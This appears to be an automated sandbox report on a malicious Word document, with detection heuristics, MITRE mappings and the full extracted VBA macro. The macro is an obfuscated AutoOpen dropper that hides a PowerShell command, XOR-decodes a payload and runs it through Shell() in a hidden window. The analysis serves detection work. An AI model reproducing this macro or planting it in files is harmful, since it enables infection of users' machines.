Verdict: MALICIOUS
Risk Score: 210
Malware Insights
MITRE ATT&CK: T1059.005 (Visual Basic), T1204.002 (Malicious File)
The sample is a malicious Office document containing a VBA macro. The macro calls the Shell() function, a critical finding that indicates an attempt to execute arbitrary commands; the call passes a window style of 36170 - 36170 = 0 (vbHide), so the spawned process runs without a visible window. The macro code is obfuscated: it concatenates many short string fragments to build a command that starts with 'Owe' (the function TzkGqhZz prepends Chr(80), the letter 'P', so the assembled command begins 'POwerSHell'). This strongly suggests that the macro's purpose is to download and execute a secondary payload.
Heuristics (7)
- ClamAV: Doc.Dropper.Agent-6584899-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Agent-6584899-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA. Matched line in script: `YRYQHd = 79003 EwBFq = aoOiaVCf + Shell(IaOzKwuhhH + NfDDKljaVu + jPBEAwO, 36170 - 36170) UItFS = nodPA`
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro [low, OLE_VBA_AUTOOPEN]: AutoOpen macro. Matched line in script: `End Function Sub AutoOpen() On Error Resume Next`
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: ab082eaf50b2a2b91a0bf6111010f0995aa549ef472dfd0563ac964f01e8eb68) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11281 bytes |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "OscBYbbNcFiGzm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "IsBZjroFVSaMih"
Function UcFGaqbSz()
On Error Resume Next
EzdKQi = 88270
JsGzd = CDate(60416)
pJiUX = UFlOEJ
zGHof = CDate(IjBlh + Sin(9415 + 5793) * 87619 * CInt(4082))
ABKnhc = CByte(tCMic)
TZLwGq = 60933
lsLXL = "Owe" + "rSHell ('2" + "3H97H112E80H97>" + "94P120~19R14H1" + "9H93>86y"
VUufb = 59564
RGwCz = CDate(73449)
BNmJiz = QHsSp
umKIf = CDate(CIAAo + Sin(5907 + 51964) * 23041 * CInt(77602))
ZZdHTR = CByte(wLrSlB)
VHWTWr = 33435
smhFr = "68~30R92!81H" + "89H86c80H71E1" + "9c65E82E" + "93~87~92R94c"
azjLjK = 50450
AmAMsf = CDate(60888)
jYfkC = jbZzC
XAhAHC = CDate(oVooi + Sin(73920 + 48287) * 35610 * CInt(51871))
diardj = CByte(pKcZvM)
Tzownq = 21412
tWsRh = "8>23x105R92x123" + "E118~67y19y14" + "y19E93P86>6" + "8c30R92P81E89P"
MuwHFN = 53243
zZhDWr = CDate(89993)
XapZLa = bNDrqt
IWCOsQ = CDate(KdOOvQ + Sin(55795 + 94560) * 33447 * CInt(46091))
GiHbTZ = CByte(IGAJV)
cZuQV = 13691
YmisjRD = "86H80R71!19P96" + ">74>64R71" + "E86c94x29" + "~125" + "c86>" + "71x29x100" + ">86R81>112H" + "95!90H86R93y71" + "P8!23E90E9"
QKrMpm = 8474
DfTnU = CDate(70194)
LFKruQ = doLGli
ViqMKG = CDate(Irwaf + Sin(29162 + 88598) * 87078 * CInt(52712))
UcQfoU = CByte(AiLcY)
Rzclu = 50571
FLhmwHsd = "8y89c101" + "!113>19y14P" + "19y2" + "0R91>71H" + "71~67P9R28" + "~28x87" + "R82>93x" + "80P" + "92x87P29c"
UcFGaqbSz = lsLXL + smhFr + tWsRh + YmisjRD + FLhmwHsd
End Function
Function pXAimiOG()
On Error Resume Next
ibbloG = 28692
WvHWNG = CDate(19225)
lOAkAk = rVzmwo
XhDpW = CDate(XDjkiK + Sin(62459 + 59330) * 78815 * CInt(92875))
JWJEsb = CByte(arbNu)
iGLJl = 71979
vwtwYaKU = "80~" + "92P94c28P6" + "8R67" + "~30P80>92~" + "93!71" + "R86"
jBzwF = 41748
tkFrp = CDate(99056)
TmSqOr = RVrHRT
EtApSO = CDate(INptsH + Sin(36862 + 11824) * 63239 * CInt(75153))
CrGLpc = CByte(JkXzbz)
ksWLq = 68029
jSwhWHZlZEN = "~93>71R28y65x11" + "7P103c96R73" + "y28H115H91" + "P71!71" + "P67>9E" + "28y28H" + "80c"
aMKZkM = 60577
BsmBw = CDate(41202)
wcjWl = TwLUUc
IFVHbR = CDate(GXRTfo + Sin(94339 + 52285) * 77302 * CInt(8087))
qhnDSr = CByte(NQNiJ)
NOAXi = 6263
DrJSLLXp = "92" + "y80x92" + "E91H92" + "H70!29!80~"
Bfspjc = 18703
FIlvSs = CDate(36770)
CdTwnP = rzvFiu
XqcYbz = CDate(QjmpU + Sin(52187 + 96587) * 89633 * CInt(30658))
NaEiz = CByte(tMmUln)
AOPpwu = 97971
noYjiIB = "92!94c29>82x70c" + "28y82P70y9" + "2y84>123!97" + "y28" + "!115y" + "91E71P71c67~9" + "P28~28E82y90P" + "85R86x64~" + "87R8" + "6!64R"
WJUdIi = 40076
hiCIm = CDate(72523)
rItRmj = FIbcq
noiIL = CDate(khdoDh + Sin(63570 + 58749) * 47379 * CInt(87535))
DHNVB = CByte(Pzikb)
zivFi = 92289
QnArwSd = "67P86P71H64" + "H29H85E65~28E69" + "y7>1" + "21>5P28!1"
VJsFs = 63403
DCMHq = CDate(61928)
EUFhF = bpGVzv
uNDWu = CDate(ooaci + Sin(643 + 42022) * 74831 * CInt(3607))
uWIkP = CByte(dsnBI)
CiRimK = 51958
qzaUjACPX = "15" + ">91E71H71P" + "67H9E28c" + "28!80R91~65"
nimwzO = 12907
OPYYso = CDate(9039)
RtLNWI = fSEck
qudFL = CDate(DGtGd + Sin(54586 + 23322) * 69891 * CInt(10194))
FBmiB = CByte(InkwMO)
qANMbb = 5956
pSjTBEr = "E9" + "0c64R71H90H9" + "3c86P9" + "5!86R" + "81y86c80" + "y88>2" + "9H80x92c"
VlPkUs = 15775
wnHvTR = CDate(12309)
wZwjjJ = BjTKo
qdOVw = CDate(pEuJq + Sin(34025 + 29439) * 92392 * CInt(61945))
jmZdKp = CByte(wdqvi)
cpQEj = 81674
RGmDIaMtuhd = "94~28x11>5c98x" + "10!28!1" + "15E91>71y" + "71>67~" + "9~28P2" + "8P68>68c68y" + "29P67c82c74!67" + "E95c" + "70P64!29!69x93H" + "28~82~6"
AQZIJi = 67003
ofPAV = CDate(49671)
IhHYsw = fLlzT
bhvDY = CDate(qNiOp + Sin(52024 + 49807) * 92434 * CInt(31353))
FQXCHb = CByte(tSaohW)
IMPRu = 66204
OEzhGljFXw = "4H103E112!127" + "c5~71!2" + "8c20~29" + "!96c67y95R90E" + "71y27y20!115" + ">20~26" + "P8y"
pXAimiOG = vwtwYaKU + jSwhWHZlZEN + DrJSLLXp + noYjiIB + QnArwSd + qzaUjACPX + pSjTBEr + RGmDIaMtuhd + OEzhGljFXw
End Function
Function iIfQZPaVqhT()
On Error Resume Next
wBOinj = 99034
smYWj = CDate(66248)
vztzKH = zLNGzi
QSQRhS = CDate(zASNM + Sin(96024 + 63539) * 9267 * CInt(79087))
GwRYjH = CByte(OBfiX)
wjGGfj = 22838
DddMoOuv = "23R" + "116H65E119R12" + "5E98~" + "107~19H14c19" + "~23!97c1" + "12R80y97>94!1" + "20x29~" + "93!86E75~71"
uUvzD = 11770
FDASj = CDate(28942)
zqHOL = dcuhU
jwQIj = CDate(jvbwY + Sin(23722 + 65346) * 71439 * CInt(59772))
inzsb = CByte(pAFLlR)
QwVNjS = 34216
JobQL = "c27E2H31c1" + "9x10>1" + "0x7~0" + "y11H4R26P8"
aMnjtR = 13201
VoNwj = CDate(42202)
zjkKT = YCGVO
HBYJb = CDate(vvLikM + Sin(34058 + 80596) * 39877 * CInt(80112))
ImZjl = CByte(kBcbAz)
jWoLXC = 88789
aSjcU = "x23y94" + "E87E66>123E" + "91H1" + "9x14>19c" + "23P86!93c69" + "x9!71y" + "86c94H67" + "c19>24"
FjuIKG = 73840
GVZjNk = CDate(34004)
iLmvDd = OJmQz
fXYNaF = CDate(sFVdVj + Sin(28119 + 46612) * 80005 * CInt(28310))
roifAw = CByte(BAlpni)
QIqfo = 80336
iFuWQ = "P19H" + "20~111!20c19>" + "24P19c23E1" + "16H65P119H125" + "~98~107E19x24" + "~19~"
alYjlj = 2394
MvDcFt = CDate(47207)
zDalYq = wLqIf
mGNicL = CDate(AfOjTK + Sin(92169 + 33862) * 79242 * CInt(62378))
SrzkR = CByte(CGJkTv)
mLHjU = 19122
FcKJjnMaT = "20c" + "29c86" + "R75~" + "86>" + "20x8E85H92>65x" + "86c82" + "y80>91>" + "27~23" + "!126"
hbttBw = 15617
AErznI = CDate(65611)
iPKjD = dJRBO
PfFfsf = CDate(UGCGjR + Sin(91099 + 24217) * 89239 * CInt(69577))
QiNvXw = CByte(OAhXX)
RGFiVk = 53485
uaWjsbRJWA = "H93c68y66y" + "11" + "6H19H90!93x1" + "9H23R90" + "!98~89c10" + "1~113"
ioSKm = 96846
tBjOuG = CDate(53216)
JQQwz = SSWOOv
ipXuN = CDate(TXNqPm + Sin(47262 + 89717) * 79646 * CInt(90163))
oOEsz = CByte(liSbi)
iQYut = 60428
JLpKaqUKt = "~26H72R71P" + "65E74c72!23~" + "105~92" + "E123H118c6" + "7!29R119E9"
nqkEOk = 54232
EcrYE = CDate(54940)
PCGAt = GmFkmi
MbUNH = CDate(DBfFUj + Sin(62529 + 351) * 12838 * CInt(41740))
wDzMo = CByte(kpLYh)
KiLvNQ = 52505
iVmFFJCM = "2>68!93!95P" + "92P82!87y11" + "7!90y95y86!" + "27P23~126P93H68" + "P66x116E29c1"
iIfQZPaVqhT = DddMoOuv + JobQL + aSjcU + iFuWQ + FcKJjnMaT + uaWjsbRJWA + JLpKaqUKt + iVmFFJCM
End Function
Function KHjLipY()
On Error Resume Next
MRMpZc = 54090
CHRTsS = CDate(58463)
ioOtv = OOoOT
blWtiX = CDate(VAoPPw + Sin(8609 + 42102) * 76807 * CInt(54529))
AOwGXJ = CByte(VLTcN)
rVkzFj = 82035
QYZbXQt = "03H92~96" + "c71c65" + "H9" + "0P93R84y27x26E" + "31P19"
BzpCO = 88661
fQiTC = CDate(39484)
cppjcW = rnOhc
wDIftL = CDate(WsTOj + Sin(33041 + 91540) * 32117 * CInt(71173))
zdwld = CByte(doqkhp)
tlUzK = 58796
BPmKNFiE = "~23P9" + "4R87R66" + "!123x91R26~8R96" + "P71R82" + "~65H71P30H9" + "9R" + "65R92x80"
UtNFED = 7695
DnGzht = CDate(81288)
wTzKL = KJsMQf
RuOhW = CDate(XlXOc + Sin(62948 + 98565) * 68487 * CInt(87500))
VwYSO = CByte(sqNftV)
SrRbG = 91928
iSzEF = "x86x64E6" + "4!19H23y" + "94" + "P87c" + "66!" + "123~91!8y"
ObGmwC = 26605
FoKAsz = CDate(6412)
wluTfQ = zVUEw
Obufp = CDate(LbiqF + Sin(89722 + 87736) * 85454 * CInt(7111))
QpiUu = CByte(BOwfHh)
lrOUF = 79533
vpiFP = "81P65E86P" + "82y88E8c" + "78x80y82>71x80" + "R91y72!68>65>90" + "H71~86~30c91x92" + "~6" + "4~71>19!23" + "E10" + "8>29~" + "118P7"
mbssaB = 58654
wKUAO = CDate(88724)
rLBKTB = HEMri
PzIzq = CDate(qIjHds + Sin(6718 + 69871) * 93024 * CInt(66771))
npMkj = CByte(HEkpz)
oEmpmN = 79603
KioQaarJrzA = "5H80" + ">86H67H7" + "1>90>92P" + "93P29x126>" + "86y64"
icEvj = 13693
mdziwU = CDate(3888)
CtdYzi = DXCkRq
KKuEl = CDate(RLOsD + Sin(90803 + 21287) * 18548 * CInt(90802))
uRAbqI = CByte(sKvwG)
Wupvbz = 12959
QuNOiGaXRSw = "P64>82x" + "84~86H8" + "R78H78'.spLit( " + "'!~ER>" + "cHxPy'" + ")|ForEacH-OBJe"
KHjLipY = QYZbXQt + BPmKNFiE + iSzEF + vpiFP + KioQaarJrzA + QuNOiGaXRSw
End Function
Function qlTKXBHJ()
On Error Resume Next
lLwnT = 40307
frjikz = CDate(40394)
jiqal = vIcOqV
ObqPZo = CDate(foqnSn + Sin(54622 + 17156) * 23783 * CInt(46655))
uLici = CByte(bDrdA)
XEnlj = 91182
fHbpMIwf = "CT{[Cha" + "R]( $_ -bx" + "or " + Chr(34) + "0x33" + Chr(34) + ")} )" + " -J" + "Oin ''| .( $en" + "v:co" + "msPE"
iBHvNo = 50830
RMWoT = CDate(75830)
jWKZV = rzdFv
Hpopr = CDate(EoKtL + Sin(69839 + 71350) * 26422 * CInt(38280))
hoCiUK = CByte(QmHopP)
CuXwO = 1918
nsBazVnQ = "C[4,2" + "6,25]-JOin'')"
qlTKXBHJ = fHbpMIwf + nsBazVnQ
End Function
Function flLJTRKo()
On Error Resume Next
RZKVdj = uXJpt
TlHDTv = CDate(45942)
DKotWK = CDate(KRnmV + Sin(14922 + 63865) * 15017 * CInt(84293))
fRPFQ = 13454
RoJXf = CByte(zwdXn)
bBXzMn = 70557
Ldwdv = wrfWQ
zwBiRz = CDate(13820)
FBQAs = CDate(QETjw + Sin(86604 + 52473) * 53626 * CInt(70848))
TLUhi = 28980
SnmiPV = CByte(WNJZb)
PAUqmf = 81110
RzUsn = sjjFoH
aEFZVV = CDate(2145)
lHORK = CDate(PzBiF + Sin(88780 + 84143) * 57427 * CInt(13751))
wHCDWf = 75221
uaaiB = CByte(NiTnw)
lVdXE = 72525
TsKzoj = uviYf
hhEXH = CDate(37344)
aDqUw = CDate(JHYfk + Sin(48998 + 21574) * 14382 * CInt(97443))
TSAvZK = 59053
iElwzi = CByte(YAIaz)
JYpIO = 56638
wRwZin = YJUcR
CvYPvi = CDate(61570)
Mjilw = CDate(RCuhY + Sin(78098 + 70519) * 60001 * CInt(42349))
ihuUtI = 79584
YBlHi = CByte(lfwWP)
RwdYA = 98534
End Function
Function TzkGqhZz()
On Error Resume Next
NPDMNW = JRXiWl
FbcrzK = CDate(22547)
iUqWjX = CDate(GiowCo + Sin(51386 + 67913) * 28602 * CInt(9442))
ZPUGP = 2025
waFXZ = CByte(SiiGXZ)
zKOlj = 70995
aatSmi = fRVaHo + Chr(FEHfXUzii + 80 + WpafVFSAUkb)
jcddS = zvNWA
ZXLCZ = CDate(55664)
GczDw = CDate(tfMuw + Sin(21765 + 36842) * 73762 * CInt(59969))
zoPwuR = 46651
isNmIw = CByte(wRGTnW)
GVXzSY = 45672
TjCzMp = uKTmI
dEpbG = CDate(93921)
XiAQBO = CDate(IASoa + Sin(1780 + 92924) * 74862 * CInt(50156))
iiFmhh = 40431
MVbDT = CByte(CbawzG)
NiJoC = 33844
TzkGqhZz = CCpvu + aatSmi + UcFGaqbSz + pXAimiOG + iIfQZPaVqhT + KHjLipY + qlTKXBHJ
ioZILE = tWpLL
wVqudz = CDate(15152)
FUOOFF = CDate(RaYDli + Sin(87775 + 41398) * 9579 * CInt(21754))
uSWCE = 83190
ZFIqi = CByte(IathL)
BFiua = 13608
End Function
Function QDYBmu(NfDDKljaVu)
On Error Resume Next
ZcTZAK = vhBZr
LikGPX = CDate(16147)
MrRNR = CDate(ELiIq + Sin(50190 + 94611) * 75574 * CInt(35559))
lkwWGt = 25554
FEAlj = CByte(VSLzJJ)
lZdrzV = 58721
BbzEw = nnraNr
jPkNT = CDate(93951)
rDqtF = CDate(BKvIs + Sin(64756 + 30065) * 54497 * CInt(95168))
nDojQ = 52233
juYPv = CByte(nEjSBm)
YRYQHd = 79003
EwBFq = aoOiaVCf + Shell(IaOzKwuhhH + NfDDKljaVu + jPBEAwO, 36170 - 36170)
UItFS = nodPA
CitJI = CDate(13865)
EBzBR = CDate(WRIYU + Sin(71659 + 23896) * 25607 * CInt(45418))
jvWUBW = 41446
aUWtiI = CByte(lVsbzQ)
DiKofc = 17128
End Function
Sub AutoOpen()
On Error Resume Next
KKzFW = FzjjF
NKXCCu = CDate(71663)
Czjqr = CDate(jcrot + Sin(96913 + 9847) * 38865 * CInt(63631))
UOCRi = 52
THMEp = CByte(aYAOBm)
XsRFL = 38536
Application.Run ppLZNbkzS + "QDYBmu" + uYSinBkodcE, RUzWuK + TzkGqhZz + JicHTqCwAB
jNWKU = JkNtH
ujGIzT = CDate(14644)
mbPFCZ = CDate(wMXLZM + Sin(60893 + 82693) * 92529 * CInt(3913))
aapjnj = 46449
JaInht = CByte(Gsrwfq)
HcOwZ = 88370
End Sub